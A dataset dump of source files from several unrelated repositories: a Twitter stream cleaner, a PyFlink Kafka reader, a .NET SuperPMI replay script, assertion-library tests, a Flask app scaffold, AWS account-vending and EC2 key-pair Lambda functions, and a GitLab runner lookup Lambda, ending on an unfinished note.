metadata (dict) | text (string, lengths 60 to 3.49M)
---|---
{
"source": "JimmyCore/Bdls-twitter-data-streaming",
"score": 2
} |
#### File: JimmyCore/Bdls-twitter-data-streaming/filtered_stream.py
```python
import sys
import requests
import os
import json
import re
# To set your environment variables in your terminal, run the following line:
# export 'BEARER_TOKEN'='<your_bearer_token>'
bearer_token = os.environ.get("BEARER_TOKEN")
def remove_whitespaces(twt):
pattern = re.compile(r'\s+')
return re.sub(pattern, '', twt)
def remove_emojis(data):
emoj = re.compile("["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
u"\U00002500-\U00002BEF" # chinese char
u"\U00002702-\U000027B0"
u"\U00002702-\U000027B0"
u"\U000024C2-\U0001F251"
u"\U0001f926-\U0001f937"
u"\U00010000-\U0010ffff"
u"\u2640-\u2642"
u"\u2600-\u2B55"
u"\u200d"
u"\u23cf"
u"\u23e9"
u"\u231a"
u"\ufe0f" # dingbats
u"\u3030"
"]+", re.UNICODE)
return re.sub(emoj, '', data)
def clean_tweet(twt):
twt = twt.lower()
twt = re.sub('#bitcoin', 'bitcoin', twt)
twt = re.sub('#[A-Za-z0-9]+', '', twt)
twt = re.sub('\\n', '', twt)
    twt = re.sub(r'https?://\S+', '', twt)
twt = twt.strip()
return twt
def bearer_oauth(r):
"""
Method required by bearer token authentication.
"""
r.headers["Authorization"] = f"Bearer {bearer_token}"
r.headers["User-Agent"] = "v2FilteredStreamPython"
return r
def get_rules():
response = requests.get(
"https://api.twitter.com/2/tweets/search/stream/rules", auth=bearer_oauth
)
if response.status_code != 200:
raise Exception(
"Cannot get rules (HTTP {}): {}".format(response.status_code, response.text)
)
return response.json()
def delete_all_rules(rules):
if rules is None or "data" not in rules:
return None
ids = list(map(lambda rule: rule["id"], rules["data"]))
payload = {"delete": {"ids": ids}}
response = requests.post(
"https://api.twitter.com/2/tweets/search/stream/rules",
auth=bearer_oauth,
json=payload
)
if response.status_code != 200:
raise Exception(
"Cannot delete rules (HTTP {}): {}".format(
response.status_code, response.text
)
)
def set_rules(delete):
# You can adjust the rules if needed
sample_rules = [
{"value": "#bitcoin lang:en", "tag": "#bitcoin"}
]
payload = {"add": sample_rules}
response = requests.post(
"https://api.twitter.com/2/tweets/search/stream/rules",
auth=bearer_oauth,
json=payload,
)
if response.status_code != 201:
raise Exception(
"Cannot add rules (HTTP {}): {}".format(response.status_code, response.text)
)
def get_stream(set):
response = requests.get(
"https://api.twitter.com/2/tweets/search/stream", auth=bearer_oauth, stream=True,
)
if response.status_code != 200:
raise Exception(
"Cannot get stream (HTTP {}): {}".format(
response.status_code, response.text
)
)
for response_line in response.iter_lines():
if response_line:
json_response = json.loads(response_line)
json_response = json_response['data']
json_response['text'] = clean_tweet(json_response['text'])
json_response['text'] = remove_emojis(json_response['text'])
json_obj = json.dumps(json_response, indent=4, sort_keys=True)
sys.stdout.write(json_obj)
def main():
rules = get_rules()
delete = delete_all_rules(rules)
set = set_rules(delete)
get_stream(set)
if __name__ == "__main__":
main()
```
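Note: `filtered_stream.py` only writes the cleaned tweets to stdout, while `flink_reader.py` below reads from the Kafka topic `twitter_twt`. The bridge between the two is not included in this dump; a minimal, hypothetical producer using kafka-python (broker address and topic name taken from `flink_reader.py`) might look like this:
```python
# Hypothetical bridge, not part of the repository dump.
import json
from kafka import KafkaProducer  # pip install kafka-python

producer = KafkaProducer(
    bootstrap_servers="localhost:9092",  # broker used by flink_reader.py
    value_serializer=lambda value: json.dumps(value).encode("utf-8"),
)

def publish_tweet(tweet):
    """Send one cleaned tweet dict (as built inside get_stream) to Kafka."""
    producer.send("twitter_twt", tweet)
    producer.flush()
```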
#### File: JimmyCore/Bdls-twitter-data-streaming/flink_reader.py
```python
import os
from pyflink.datastream import StreamExecutionEnvironment
from pyflink.table import StreamTableEnvironment, EnvironmentSettings
def main():
# Create streaming environment
env = StreamExecutionEnvironment.get_execution_environment()
settings = EnvironmentSettings.new_instance() \
.in_streaming_mode() \
.use_blink_planner() \
.build()
# create table environment
tbl_env = StreamTableEnvironment.create(stream_execution_environment=env,
environment_settings=settings)
# add kafka connector dependency
kafka_jar = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'flink-sql-connector-kafka_2.11-1.13.0.jar')
tbl_env.get_config() \
.get_configuration() \
.set_string("pipeline.jars", "file://{}".format(kafka_jar))
#######################################################################
# Create Kafka Source Table with DDL
#######################################################################
src_ddl = """
CREATE TABLE tweets (
tweet_id BIGINT,
text VARCHAR(4000),
proctime AS PROCTIME()
) WITH (
'connector' = 'kafka',
'topic' = 'twitter_twt',
'properties.bootstrap.servers' = 'localhost:9092',
'properties.group.id' = 'twitter_twt',
'format' = 'json'
)
"""
tbl_env.execute_sql(src_ddl)
# create and initiate loading of source Table
tbl = tbl_env.from_path('tweets')
print('\nSource Schema')
tbl.print_schema()
    #####################################################################
    # Define the query (currently a simple pass-through of all tweets)
    #####################################################################
sql = """
SELECT * FROM tweets
"""
revenue_tbl = tbl_env.sql_query(sql)
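    # Note: as written, the script only defines the query; nothing executes the
    # pipeline or consumes revenue_tbl. Assuming the PyFlink 1.13 Table API used
    # above, one minimal way to run it and print rows as they arrive would be:
    #
    #     revenue_tbl.execute().print()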
if __name__ == '__main__':
main()
``` |
{
"source": "JimmyCushnie/runtime",
"score": 2
} |
#### File: coreclr/scripts/superpmi-replay.py
```python
import argparse
import os
import sys
from os import path
from os import listdir
from coreclr_arguments import *
from superpmi_setup import run_command
parser = argparse.ArgumentParser(description="description")
parser.add_argument("-arch", help="Architecture")
parser.add_argument("-platform", help="OS platform")
parser.add_argument("-jit_directory", help="path to the directory containing clrjit binaries")
parser.add_argument("-log_directory", help="path to the directory containing superpmi log files")
jit_flags = [
"JitStressRegs=0",
"JitStressRegs=1",
"JitStressRegs=2",
"JitStressRegs=3",
"JitStressRegs=4",
"JitStressRegs=8",
"JitStressRegs=0x10",
"JitStressRegs=0x80",
"JitStressRegs=0x1000",
]
def setup_args(args):
""" Setup the args for SuperPMI to use.
Args:
args (ArgParse): args parsed by arg parser
Returns:
args (CoreclrArguments)
"""
coreclr_args = CoreclrArguments(args, require_built_core_root=False, require_built_product_dir=False,
require_built_test_dir=False, default_build_type="Checked")
coreclr_args.verify(args,
"arch",
lambda unused: True,
"Unable to set arch")
coreclr_args.verify(args,
"platform",
lambda unused: True,
"Unable to set platform")
coreclr_args.verify(args,
"jit_directory",
lambda jit_directory: os.path.isdir(jit_directory),
"jit_directory doesn't exist")
coreclr_args.verify(args,
"log_directory",
lambda log_directory: True,
"log_directory doesn't exist")
return coreclr_args
def main(main_args):
"""Main entrypoint
Args:
main_args ([type]): Arguments to the script
"""
python_path = sys.executable
cwd = os.path.dirname(os.path.realpath(__file__))
coreclr_args = setup_args(main_args)
spmi_location = path.join(cwd, "artifacts", "spmi")
log_directory = coreclr_args.log_directory
platform_name = coreclr_args.platform
os_name = "win" if platform_name.lower() == "windows" else "unix"
arch_name = coreclr_args.arch
host_arch_name = "x64" if arch_name.endswith("64") else "x86"
jit_path = path.join(coreclr_args.jit_directory, 'clrjit_{}_{}_{}.dll'.format(os_name, arch_name, host_arch_name))
print("Running superpmi.py download")
run_command([python_path, path.join(cwd, "superpmi.py"), "download", "--no_progress", "-target_os", platform_name,
"-target_arch", arch_name, "-core_root", cwd, "-spmi_location", spmi_location], _exit_on_fail=True)
failed_runs = []
for jit_flag in jit_flags:
log_file = path.join(log_directory, 'superpmi_{}.log'.format(jit_flag.replace("=", "_")))
print("Running superpmi.py replay for {}".format(jit_flag))
_, _, return_code = run_command([
python_path, path.join(cwd, "superpmi.py"), "replay", "-core_root", cwd,
"-jitoption", jit_flag, "-jitoption", "TieredCompilation=0",
"-target_os", platform_name, "-target_arch", arch_name,
"-arch", host_arch_name,
"-jit_path", jit_path, "-spmi_location", spmi_location,
"-log_level", "debug", "-log_file", log_file])
if return_code != 0:
failed_runs.append("Failure in {}".format(log_file))
# Consolidate all superpmi_*.logs in superpmi_platform_architecture.log
final_log_name = path.join(log_directory, "superpmi_{}_{}.log".format(platform_name, arch_name))
print("Consolidating final {}".format(final_log_name))
with open(final_log_name, "a") as final_superpmi_log:
for superpmi_log in listdir(log_directory):
if not superpmi_log.startswith("superpmi_Jit") or not superpmi_log.endswith(".log"):
continue
print("Appending {}".format(superpmi_log))
final_superpmi_log.write("======================================================={}".format(os.linesep))
final_superpmi_log.write("Contents from {}{}".format(superpmi_log, os.linesep))
final_superpmi_log.write("======================================================={}".format(os.linesep))
with open(path.join(log_directory, superpmi_log), "r") as current_superpmi_log:
contents = current_superpmi_log.read()
final_superpmi_log.write(contents)
# Log failures summary
if len(failed_runs) > 0:
final_superpmi_log.write(os.linesep)
final_superpmi_log.write(os.linesep)
final_superpmi_log.write("========Failed runs summary========".format(os.linesep))
final_superpmi_log.write(os.linesep.join(failed_runs))
return 0 if len(failed_runs) == 0 else 1
if __name__ == "__main__":
args = parser.parse_args()
sys.exit(main(args))
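# Example invocation (paths below are illustrative placeholders only):
#   python superpmi-replay.py -arch x64 -platform windows \
#       -jit_directory <path-to-clrjit-binaries> -log_directory <path-to-logs>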
``` |
{
"source": "jimmydo/grain",
"score": 3
} |
#### File: grain/tests/__init__.py
```python
from grain import expect
from .utils import assert_raises, assert_raises_assertion
class ExpectedError(Exception):
pass
class ActualError(Exception):
pass
class TestExpect(object):
def test_takes_one_argument(self):
expect(None)
def test_does_not_allow_zero_arguments(self):
with assert_raises(TypeError):
expect()
class TestExtend(object):
def setup(self):
class Extension(object):
def some_method(self):
pass
@classmethod
def some_classmethod(cls):
pass
self.extension = Extension
def test_overrides_base_method(self):
items = []
class Extension(object):
@staticmethod
def fail():
items.append('fail')
expecter = expect.extend(Extension)
expecter.fail()
assert items == ['fail']
def test_right_most_extension_takes_precedence(self):
items = []
class Extension(object):
def some_method(self):
items.append('method')
@classmethod
def some_classmethod(cls):
items.append('classmethod')
expecter = expect.extend(self.extension, Extension)
expecter(None).some_method()
expecter.some_classmethod()
assert items == ['method', 'classmethod']
class TestFail(object):
def test_raises_AssertionError(self):
with assert_raises_assertion(''):
expect.fail()
class TestEqual(object):
def test_passes_for_equal_values(self):
expect('apple').equal('apple')
def test_fails_for_unequal_values(self):
with assert_raises_assertion("Expected 'apple' == 'orange'"):
expect('apple').equal('orange')
class TestNotEqual(object):
def test_passes_for_unequal_values(self):
expect('apple').not_equal('orange')
def test_fails_for_equal_values(self):
with assert_raises_assertion("Expected 'apple' != 'apple'"):
expect('apple').not_equal('apple')
class TestIs(object):
def test_passes_for_same_values(self):
expect(False).is_(False)
def test_fails_for_different_values(self):
with assert_raises_assertion('Expected False is True'):
expect(False).is_(True)
class TestIsNot(object):
def test_passes_for_different_values(self):
expect(False).is_not(True)
def test_fails_for_same_values(self):
with assert_raises_assertion('Expected False is not False'):
expect(False).is_not(False)
class TestLess(object):
def test_passes_for_larger_value(self):
expect(10).less(11)
def test_fails_for_smaller_value(self):
with assert_raises_assertion('Expected 10 < 9'):
expect(10).less(9)
class TestLessEqual(object):
def test_passes_for_larger_value(self):
expect(10).less_equal(11)
def test_passes_for_equal_value(self):
expect(10).less_equal(10)
def test_fails_for_smaller_value(self):
with assert_raises_assertion('Expected 10 <= 9'):
expect(10).less_equal(9)
class TestGreater(object):
def test_passes_for_smaller_value(self):
expect(10).greater(9)
def test_fails_for_larger_value(self):
with assert_raises_assertion('Expected 10 > 11'):
expect(10).greater(11)
class TestGreaterEqual(object):
def test_passes_for_smaller_value(self):
expect(10).greater_equal(9)
def test_passes_for_equal_value(self):
expect(10).greater_equal(10)
def test_fails_for_larger_value(self):
with assert_raises_assertion('Expected 10 >= 11'):
expect(10).greater_equal(11)
class TestAlmostEqual(object):
def test_passes_for_equal_values(self):
expect(1.0000001).almost_equal(1.00000014)
expect(1.0000001).almost_equal(1.00000006)
def test_fails_for_unequal_values(self):
with assert_raises_assertion(
'Expected 1.0000001 almost equal to 1.00000016 (7)'):
expect(1.0000001).almost_equal(1.00000016)
class TestNotAlmostEqual(object):
def test_passes_for_unequal_values(self):
expect(1.0000001).not_almost_equal(1.00000016)
def test_fails_for_equal_values(self):
with assert_raises_assertion(
'Expected 1.0000001 not almost equal to 1.00000014 (7)'):
expect(1.0000001).not_almost_equal(1.00000014)
class TestRaises(object):
def test_passes_for_expected_exception(self):
with expect.raises(ExpectedError):
raise ExpectedError
def test_fails_when_no_exception_is_raised(self):
with assert_raises_assertion(
"Expected code to raise <class 'tests.ExpectedError'>"):
with expect.raises(ExpectedError):
pass
def test_allows_unexpected_exception_to_bubble_up(self):
with assert_raises(ActualError, 'Unexpected exception should bubble up'):
with expect.raises(ExpectedError):
raise ActualError('Unexpected exception should bubble up')
``` |
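The helpers imported from `tests/utils.py` are not included in this dump. Based on how they are used above, a minimal sketch of them might look roughly like this (an assumption, not the project's actual implementation):
```python
# Hypothetical sketch of tests/utils.py, inferred from usage in the tests above.
from contextlib import contextmanager

@contextmanager
def assert_raises(exception_class, message=None):
    """Pass if the block raises exception_class (optionally with the exact message)."""
    try:
        yield
    except exception_class as error:
        if message is not None:
            assert str(error) == message, 'Unexpected message: {!r}'.format(str(error))
    else:
        raise AssertionError('Expected {!r} to be raised'.format(exception_class))

def assert_raises_assertion(message):
    """Pass if the block raises AssertionError with exactly the given message."""
    return assert_raises(AssertionError, message)
```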
{
"source": "jimmydong/YEPY2",
"score": 2
} |
#### File: YEPY2/demoV3/app.py
```python
import config  # load configuration file
import bucketV3 as bucket  # load global variables
from flask import Flask, render_template, request, make_response, current_app
from flask_debugtoolbar import DebugToolbarExtension
from flask_uploads import configure_uploads, UploadSet
from werkzeug.utils import import_string
import logging
from logging.handlers import RotatingFileHandler
import time
import html
import os
import setproctitle
from job import myJob
from yepy.console import embed
# set the process name
setproctitle.setproctitle(setproctitle.getproctitle() + ' ' + config.Config.APP_NAME + ':' + str(config.Config.APP_PORT))
#The Flask Application
def createApp():
app = Flask(__name__)
    # register blueprints
for bp_name in config.blueprints:
bp = import_string(bp_name)
app.register_blueprint(bp)
    # load development or production configuration depending on the debug flag
if config.is_debug == True:
app.config.from_object(config.DevelopmentConfig)
else:
app.config.from_object(config.ProductionConfig)
return app
app = createApp()
# initialize global variables
bucket.G.begin_time = time.strftime("%Y-%m-%d %H:%M:%S")
bucket.G.counter = 0
bucket.G.counter_success = 0
# initialize core plugins
bucket.debug.start()
if app.config.get('CACHE_ENABLE'):
bucket.cache.init_app(app, config={'CACHE_TYPE':'memcached'}) # 'simple' | 'memcached' | 'redis'
if app.config.get('DEBUG'):
toolbar = DebugToolbarExtension(app)
if app.config.get('LOG_FILE'):
file_handler = RotatingFileHandler(app.config['LOG_FILE'], maxBytes=app.config['LOG_SIZE'], backupCount=5)
file_handler.setLevel(logging.DEBUG)
app.logger.addHandler(file_handler)
photos = UploadSet(name='photos',extensions=('jpg','gif','png'))
files = UploadSet(name='files',extensions=('txt','rar','zip'))
configure_uploads(app,(photos,files))
# Framework
@app.before_request
def before_request():
if bucket.debug.opened():
bucket.debug.reload()
pass
@app.after_request
def after_request(response):
    if request.path.find('/static/') > -1:
return response
bucket.debug.time('after')
headers = bucket.debug.show()
if len(headers) > 0:
for key in headers:
response.headers[key] = headers[key]
response.headers["Server"] = "Python/Power by YEPY %s" % config._yepy_application_version
response.headers["Expires"] = "Expires: Mon, 26 Jul 1997 05:00:00 GMT"
response.headers["Cache-Control"] = "no-cache"
response.headers["Pragma"] = "no-cache"
return response
#@app.teardown_request
#def teardown_request():
# pass
with app.app_context():
pass
# upload handling
@app.route("/uploadPhoto", methods=['GET','POST'])
def uploadPhoto():
if request.method == 'POST' and 'photo' in request.files:
filename = photos.save(request.files['photo'])
return photos.url(filename)
else:
return "No photo uploaded!"
# error handling
@app.errorhandler(404)
def not_found(error):
out = repr(app.url_map)
response = make_response('页面未找到 page not found <br/><pre>' + cgi.escape(out) + '</pre>', 404)
return response
# temporary test route
@app.route("/test")
def test():
#print_r(bucket.mongo2.db.collection_names())
test = bucket.mongo2.db.test
test.insert({'test':'hello world'})
return "Hello World!"
if __name__ == '__main__':
#embed()
    # write the PID file
pid = os.getpid()
pid_file = "app.pid"
with open(pid_file,"w") as f:
f.write(str(pid))
    # append the port to the process name
setproctitle.setproctitle(setproctitle.getproctitle() + ' ' + str(app.config['APP_PORT']))
    # start the worker thread
if bucket.worker.checkStatus() == False:
job = bucket.worker.setJob(myJob)
job.setDaemon(True)
job.start()
bucket.worker.checkStatus()
    # start the HTTP listener
app.run(host=app.config['APP_HOST'],port=app.config['APP_PORT'],use_reloader=app.config['USE_RELOADER'])
    # program shutdown
if bucket.worker.checkStatus() == 'running':
print("warnning: worker is still not finished, force abort.")
if(os.path.exists(pid_file)):
os.remove(pid_file)
print(" ---=== application finished at %s! ===---" % time.strftime("%Y-%m-%d %H:%M:%S"))
```
#### File: lib/controller/__init__.py
```python
from flask import Blueprint, render_template, abort, request, current_app, make_response
from jinja2 import TemplateNotFound
import bucket
_yepy_controller_version = '1.0b'
def init():
# init before action
out = bucket.ConfigG()
return out
def show(out):
# show after action
try:
if bucket._controller == 'index':
response = make_response(render_template('%s.html' % (bucket._action), out=out))
else:
response = make_response(render_template('%s/%s.html' % (bucket._controller,bucket._action), out=out))
return response
except TemplateNotFound:
abort(404)
```
#### File: jimmydong/YEPY2/test.py
```python
import run
def hello():
    # want to call a unified debug method here
print(run.v)
run.t.inc()
run.mydebug("hello world" + run.ok)
``` |
{
"source": "JimmyDqv/AWS-Account-Vending-Machine",
"score": 2
} |
#### File: AWS-Account-Vending-Machine/src/createAccount.py
```python
import os
import sys
import boto3
import botocore
import json
import time
from debug import debug_print
from debug import error_print
from botoHelper import get_boto_client
def handler(event, context):
debug_print(json.dumps(event, indent=2))
return main(event)
def main(event):
account_name = event.get("accountName")
account_email = event.get("accountEmail")
account_role = event.get("accountRole")
account_request_id = create_account(
account_name, account_email, account_role)
event["accountRequestId"] = account_request_id
return event
def create_account(name, email, role):
account_request_id = None
client = get_boto_client('organizations')
debug_print(
"Creating account with {} name and e-mail {}".format(name, email))
response = client.create_account(Email=email, AccountName=name,
RoleName=role,
IamUserAccessToBilling="ALLOW")
account_request_id = response['CreateAccountStatus']['Id']
return account_request_id
```
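`create_account` only starts the account creation and returns the request id. Not part of this dump, and the actual project may drive this step differently (for example from a Step Functions wait state), but a minimal sketch of polling that id with the same Organizations API could look like this:
```python
# Hypothetical polling helper, shown for illustration only.
import time
from botoHelper import get_boto_client

def wait_for_account(account_request_id, delay_seconds=10):
    client = get_boto_client("organizations")
    while True:
        status = client.describe_create_account_status(
            CreateAccountRequestId=account_request_id
        )["CreateAccountStatus"]
        if status["State"] == "SUCCEEDED":
            return status["AccountId"]
        if status["State"] == "FAILED":
            raise Exception("Account creation failed: {}".format(status.get("FailureReason")))
        time.sleep(delay_seconds)
```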
#### File: AWS-Account-Vending-Machine/src/createOU.py
```python
import os
import sys
import boto3
import botocore
import json
import time
from debug import debug_print
from botoHelper import get_boto_client
def handler(event, context):
debug_print(json.dumps(event, indent=2))
return main(event)
def main(event):
ou_name = event.get("ouName")
debug_print("OU Name: {}".format(ou_name))
root_ou_id = get_organization_root_id()
debug_print("Root OU ID: {}".format(root_ou_id))
new_ou_id = create_organizational_unit(root_ou_id, ou_name)
debug_print("New OU ID: {}".format(new_ou_id))
event["rootOuId"] = root_ou_id
event["ouId"] = new_ou_id
return event
def get_organization_root_id():
client = get_boto_client("organizations")
response = client.list_roots()
# debug_print(response)
root_id = response['Roots'][0]['Id']
return root_id
def create_organizational_unit(root_ou_id, ou_name):
debug_print("Creating new OU if needed with name {}".format(ou_name))
ou_id = get_ou_id_for_name(root_ou_id, ou_name)
if ou_id == None:
client = get_boto_client("organizations")
response = client.create_organizational_unit(
ParentId=root_ou_id,
Name=ou_name
)
new_ou_id = response["OrganizationalUnit"]["Id"]
debug_print("Created OU with ID: {}".format(new_ou_id))
return new_ou_id
debug_print("OU already existed. ID: {}".format(ou_id))
return ou_id
def get_ou_id_for_name(root_id, ou_name):
debug_print("get id for {} in {}".format(ou_name, root_id))
client = get_boto_client("organizations")
response = client.list_organizational_units_for_parent(
ParentId=root_id,
MaxResults=10)
ous = response["OrganizationalUnits"]
for ou in ous:
if ou["Name"] == ou_name:
return ou["Id"]
while('NextToken' in response):
response = client.list_organizational_units_for_parent(
ParentId=root_id,
MaxResults=10,
NextToken=response['NextToken']
)
ous = response["OrganizationalUnits"]
for ou in ous:
if ou["Name"] == ou_name:
                return ou["Id"]
return None
```
#### File: AWS-Account-Vending-Machine/src/deployCloudFormation.py
```python
import os
import sys
import boto3
import json
import time
from debug import debug_print
from debug import error_print
from botoHelper import get_boto_client
def handler(event, context):
debug_print(json.dumps(event, indent=2))
return main(event)
def main(event):
account_id = event.get("accountId")
account_role = event.get("accountRole")
credentials = assume_role(account_id, account_role)
access_key = credentials['AccessKeyId']
secret_access_key = credentials['SecretAccessKey']
session_token = credentials['SessionToken']
cfn_client = get_boto_client("cloudformation", access_key,
secret_access_key, session_token)
templates = event["cfnTemplates"]
for template in templates:
deploy_cloudformation_template(cfn_client, template, event)
return event
def deploy_cloudformation_template(cfn_client, template, event):
bucket = os.environ['CLOUDFORMATION_TEMPLATE_BUCKET']
templateName = template["templateName"]
stackName = template["stackName"]
debug_print("Deploying CFN Template: {}".format(templateName))
parameters = create_cloudformation_parameters(
template["parameters"], event)
debug_print(json.dumps(parameters, indent=2))
presigned_url = create_s3_presigned_url(bucket, templateName)
debug_print(presigned_url)
if not cloudformation_stack_exists(cfn_client, stackName, "eu-west-1"):
create_cloudformation_stack(
cfn_client, presigned_url, stackName, "eu-west-1", parameters)
else:
update_cloudformation_stack(
cfn_client, presigned_url, stackName, "eu-west-1", parameters)
def create_cloudformation_parameters(parameters, event):
cfnParams = []
for parameter in parameters:
key = parameter["key"]
value = parameter["value"]
if value.startswith("{{") and value.endswith("}}"):
value = value[2:len(value)-2]
value = event.get(value)
cfnParams.append({
'ParameterKey': key,
'ParameterValue': value
})
return cfnParams
def assume_role(account_id, role_name):
debug_print("Assuming role.....")
role_arn = "arn:aws:iam::{0}:role/{1}".format(account_id, role_name)
client = get_boto_client('sts')
assumed_role = client.assume_role(
RoleArn=role_arn,
RoleSessionName="account_vending_machine_lambda"
)
return assumed_role['Credentials']
def create_s3_presigned_url(bucket, object):
client = get_boto_client('s3')
response = client.generate_presigned_url('get_object',
Params={
'Bucket': bucket,
'Key': object
},
ExpiresIn=3600)
return response
def create_cloudformation_stack(client, template_url, stackname, stackregion, parameters):
create_date = time.strftime("%d/%m/%Y")
response = client.create_stack(
StackName=stackname,
TemplateURL=template_url,
Parameters=parameters,
NotificationARNs=[],
Capabilities=[
'CAPABILITY_NAMED_IAM',
],
OnFailure='ROLLBACK',
Tags=[
{
'Key': 'CreatedBy',
'Value': 'Account-Vending-Machine'
},
{
'Key': 'CreatedAt',
'Value': create_date
}
]
)
debug_print("Stack creation in process...")
debug_print(response)
stack_creating = True
while stack_creating is True:
event_list = client.describe_stack_events(
StackName=stackname).get("StackEvents")
stack_event = event_list[0]
if (stack_event.get('ResourceType') == 'AWS::CloudFormation::Stack' and
stack_event.get('ResourceStatus') == 'CREATE_COMPLETE'):
stack_creating = False
debug_print("Stack creation completed!")
elif (stack_event.get('ResourceType') == 'AWS::CloudFormation::Stack' and
stack_event.get('ResourceStatus') == 'ROLLBACK_COMPLETE'):
stack_creating = False
debug_print("Stack construction failed!!")
else:
debug_print("Stack creating...")
time.sleep(5)
def update_cloudformation_stack(client, template_url, stackname, stackregion, parameters):
debug_print("Updating stack: {}".format(stackname))
try:
update_date = time.strftime("%d/%m/%Y")
response = client.update_stack(
StackName=stackname,
TemplateURL=template_url,
Parameters=parameters,
NotificationARNs=[],
Capabilities=[
'CAPABILITY_NAMED_IAM',
],
Tags=[
{
'Key': 'CreatedBy',
'Value': 'Account-Vending-Machine'
},
{
'Key': 'UpdatedAt',
'Value': update_date
}
]
)
debug_print("Stack update in process...")
debug_print(response)
stack_updating = True
while stack_updating is True:
event_list = client.describe_stack_events(
StackName=stackname).get("StackEvents")
stack_event = event_list[0]
if (stack_event.get('ResourceType') == 'AWS::CloudFormation::Stack' and
stack_event.get('ResourceStatus') == 'UPDATE_COMPLETE'):
stack_updating = False
debug_print("Stack update completed!")
elif (stack_event.get('ResourceType') == 'AWS::CloudFormation::Stack' and
stack_event.get('ResourceStatus') == 'UPDATE_ROLLBACK_COMPLETE'):
stack_updating = False
debug_print("Stack update failed!!")
else:
debug_print("Stack updating...")
time.sleep(5)
except Exception as e:
message = getattr(e, 'message', str(e))
# debug_print("------------------------------------")
# debug_print(message)
# debug_print("------------------------------------")
if "No updates are to be performed" not in message:
raise e
else:
debug_print("Stack already up to date!")
def cloudformation_stack_exists(client, stackname, stackregion):
try:
client.describe_stacks(
StackName=stackname
)
return True
    except Exception:
return False
``` |
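`botoHelper.get_boto_client` is imported throughout but not included in this dump. Judging from the call sites above (plain service name, or service name plus the temporary credentials returned by `assume_role`), it is likely something close to this sketch:
```python
# Hypothetical sketch of botoHelper.get_boto_client, inferred from its call sites.
import boto3

def get_boto_client(service, access_key=None, secret_access_key=None, session_token=None):
    if access_key is None:
        # No explicit credentials: use the Lambda execution role.
        return boto3.client(service)
    # Explicit credentials: build a client for the assumed role in the target account.
    return boto3.client(
        service,
        aws_access_key_id=access_key,
        aws_secret_access_key=secret_access_key,
        aws_session_token=session_token,
    )
```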
{
"source": "JimmyDqv/blogs-and-sessions-code",
"score": 2
} |
#### File: Http-api-auth0-jwt/src/list-all-unicorns.py
```python
import json
def lambda_handler(event, context):
unicorns = [
{
"name": "Gaia",
"gift": "Speed"
},
{
"name": "Magestic",
"gift": "Magic"
},
{
"name": "Sparkles",
"gift": "Glitter"
}
]
return {
'statusCode': 200,
'body': json.dumps(unicorns)
}
``` |
{
"source": "JimmyDqv/CloudformationMacros",
"score": 2
} |
#### File: Ec2KeyPair/src/create.py
```python
import json
import logging
import string
import random
import boto3
from common import get_params
from common import get_parameter
log = logging.getLogger('Macro-Ec2KeyPair-Create')
log.setLevel(logging.DEBUG)
ec2_client = boto3.client('ec2')
s3_client = boto3.client('s3')
def create_and_store_key_pair(event):
log.debug(json.dumps(event, indent=2))
fragment = event['fragment']
params = get_params(event)
s3_bucket = get_parameter(params, 'S3Bucket', None)
s3_key = get_parameter(params, 'S3Key', None)
key_name = get_parameter(params, 'Keyname', None)
if key_name == None:
key_name = generate_name(20)
    if not does_key_pair_exists(key_name):
        response = ec2_client.create_key_pair(
            KeyName=key_name
        )
        store_key_material(response, s3_bucket, s3_key)
    # Resolve the fragment to the key pair name whether it was just created or already existed.
    fragment = key_name
return {
'requestId' : event['requestId'],
'status' : 'success',
'fragment' : fragment
}
def store_key_material(create_response, s3_bucket, s3_key):
key_material = create_response['KeyMaterial']
s3_client.put_object(
Bucket=s3_bucket,
Key=s3_key,
Body=key_material
)
def does_key_pair_exists(name):
try:
ec2_client.describe_key_pairs(
KeyNames=[
name
]
)
return True
    except Exception:
        return False
def generate_name(size=12):
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(size))
```
#### File: Ec2KeyPair/src/index.py
```python
import json
import logging
from common import get_params
from common import get_parameter
from common import create_failure
from create import create_and_store_key_pair
from rotate import rotate_key_pair
log = logging.getLogger('Macro-Ec2KeyPair')
log.setLevel(logging.DEBUG)
def handler(event, context):
log.debug(json.dumps(event, indent=2))
params = get_params(event)
operation = get_parameter(params, 'Operation', None)
s3_bucket = get_parameter(params, 'S3Bucket', None)
s3_key = get_parameter(params, 'S3Key', None)
# Operation, S3Bucket and S3Key are always required!
if operation == None or s3_bucket == None or s3_key == None:
return create_failure(event)
if operation == 'CREATE':
return create_and_store_key_pair(event)
elif operation == 'ROTATE':
return rotate_key_pair(event)
return create_failure(event)
``` |
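For illustration, a transform request shaped like the standard CloudFormation macro event (parameter names taken from the code above, assuming `get_params()` reads them from `event["params"]`; bucket, key and key pair name are placeholders) would exercise the CREATE path roughly as follows:
```python
# Hypothetical macro event, shown for illustration only.
sample_event = {
    "requestId": "11111111-2222-3333-4444-555555555555",
    "region": "eu-west-1",
    "fragment": "placeholder",
    "params": {
        "Operation": "CREATE",
        "S3Bucket": "my-keypair-bucket",
        "S3Key": "keys/my-instance-key.pem",
        "Keyname": "my-instance-key",
    },
}

# handler(sample_event, None) is expected to return something like:
# {"requestId": "...", "status": "success", "fragment": "my-instance-key"}
```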
{
"source": "JimmyDqv/gitlab-runners-on-aws",
"score": 2
} |
#### File: lambdas/lookup/lookup-runner.py
```python
import logging
import json
import os
import boto3
logger = logging.getLogger("lookup-runner")
logger.setLevel(logging.DEBUG)
def handler(event, context):
job_name = get_job_name(event)
debug_print(f"Job name: {job_name}")
runner = find_runner_for_job(job_name=job_name)
return {
"Arn": runner['arn'],
"Type": runner['type']
}
def get_job_name(event):
return event['detail']['build_name']
def find_runner_for_job(job_name):
pk = f"job#{job_name}"
dynamodb_client = boto3.client('dynamodb')
response = dynamodb_client.query(
TableName=os.environ["RUNNERS_TABLE"],
KeyConditionExpression='pk = :pk',
ExpressionAttributeValues={
':pk': {'S': pk}
}
)
if len(response['Items']) > 0:
runner = {
"type": response['Items'][0]['type']['S']
}
if runner['type'] == 'LAMBDA':
            runner['arn'] = response['Items'][0]['arn']['S']
else:
runner['arn'] = '-'
return runner
# No runner found, return default
return {
"arn": os.environ['DEFAULT_RUNNER'],
"type": "LAMBDA"
}
def debug_print(message):
logger.debug(message)
```
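The handler only relies on `detail.build_name` from the incoming EventBridge event and on the two environment variables. A hypothetical local test (table name and default runner ARN are made-up values) might look like this:
```python
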